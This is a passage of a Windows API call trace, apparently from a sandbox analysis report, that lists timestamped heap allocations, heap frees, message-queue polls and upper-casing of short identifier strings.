(HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0161.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5e0 [0161.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa730 [0161.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0161.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0161.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6d0 [0161.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0161.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0161.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0161.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0161.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0161.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0161.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0161.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0161.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0161.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0161.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0161.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0161.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0161.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0161.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0161.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0161.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0161.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0161.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0161.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0161.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0161.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0161.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0161.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0161.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0161.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0161.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0161.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0161.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0161.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0161.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0161.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0161.403] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0161.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0161.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0161.403] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0161.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0161.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0161.404] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0161.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0161.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0161.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5f8 [0161.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0161.404] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0161.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0161.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0161.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0161.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0161.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0161.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0161.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0161.404] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0161.404] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0161.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0161.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0161.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0161.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0161.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0161.405] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0161.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0161.405] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0161.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0161.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0161.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0161.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0161.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0161.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0161.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0161.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0161.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0161.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0161.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0161.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0161.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0161.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0161.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0161.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0161.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0161.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0161.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0161.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0161.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0161.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0161.407] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0161.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0161.407] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0161.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0161.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0161.407] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0161.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0161.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0161.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0161.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0161.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0161.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0161.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0161.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0161.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0161.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.408] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0161.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0161.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0161.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0161.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0161.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0161.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0161.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0161.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0161.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0161.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0161.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0161.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0161.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0161.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0161.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0161.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0161.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0161.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0161.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0161.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0161.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0161.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0161.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0161.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0161.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0161.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0161.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0161.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0161.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0161.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0161.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0161.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0161.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0161.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0161.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0161.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0161.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0161.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0161.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0161.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0161.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0161.410] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.411] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0161.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0161.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.411] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0161.411] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0161.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0161.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0161.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0161.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0161.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.411] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0161.411] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0161.411] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0161.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0161.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.412] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0161.412] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0161.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0161.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0161.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0161.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0161.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.412] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0161.412] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0161.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0161.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0161.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0161.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0161.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0161.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0161.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0161.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: 